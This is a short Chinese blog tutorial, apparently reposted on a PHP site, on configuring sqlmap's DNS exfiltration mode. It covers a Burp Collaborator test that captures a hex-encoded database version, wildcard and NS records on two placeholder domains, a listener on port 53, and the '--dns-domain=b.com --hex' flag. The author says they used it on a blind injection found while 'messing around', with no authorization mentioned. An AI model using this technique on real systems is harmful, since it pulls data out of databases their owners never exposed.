網路上針對sqlmap進行dns注入的相關文章太少,只是簡單介紹了下--dns-domain參數,相關的實戰文章要么就寫的模糊或者一筆帶過,搞的雲裡霧裡(主要是菜,關鍵還沒大佬帶)。然後自己參考網路上的方法自己重新搞了一遍。
需要準備的東西,sqlmap、windows盲註一個、兩個網域、一台外網伺服器。
某次搞事情的時候碰到一個時間盲注,剛好是台windows的,想起dns注入的方法。
在開始前我準備先用sqlmap的--sql-shell 指令進行dns注入payload的測試
先到burpsuite中的collaborator client中複製出burp給我們安排的網域
在利用sqlmap執行sql語句
##Sqlmap還在跑的過程中burpsuite中已經接收到請求了。
352E362E3134.9hreqpopru1xgf9skq473yo14sajy8.burpcollaborator.net.
中的352E362E3134就是執行version()後返回的結果。
解碼取得到mysql的版本。好了至此這個點進行dns注入是沒毛病的。
準備配置網域2個,網路上有些文章說一個也行,但是總感覺較為麻煩,很多網域伺服器商也並未提供某些進階功能,所以還是準備兩個的簡單些。
www.a.com
www.b.com
#首先我們來設定網域a-> a.com
只需要新增*進行泛解析指向我們的外網伺服器的ip就可以了。
在來設定我們的網域b->b.com
這就更簡單了,直接修改網域的dns,就填入ns1 .a.com ns2.a.com 就行了其他的都不用搞,照著填寫就行了。
然後等待網域生效。我們在到外網伺服器上來測試下看是否解析成功
伺服器上開始監聽53埠
然後本機ping hello.b.com 在外網伺服器上發我們已經能接受到hello.b.com的請求,而本機提示是找不到主機不用管,因為我們沒有設定解析。已經都配置完畢我們使用sqlmap進行dns注入即可。
Sqlmap中加入參數--dns-domain=b.com --hex即可
來到這一步sqlmap會卡住提示設定DNS伺服器實例
直接ctrl c
#提示透過DNS通道的資料檢索成功。
注入的速度就跟報錯和聯合一樣快了,再也不用忍受龜速了。
以上是sqlmap _dns注入配置方法是什麼的詳細內容。更多資訊請關注PHP中文網其他相關文章!
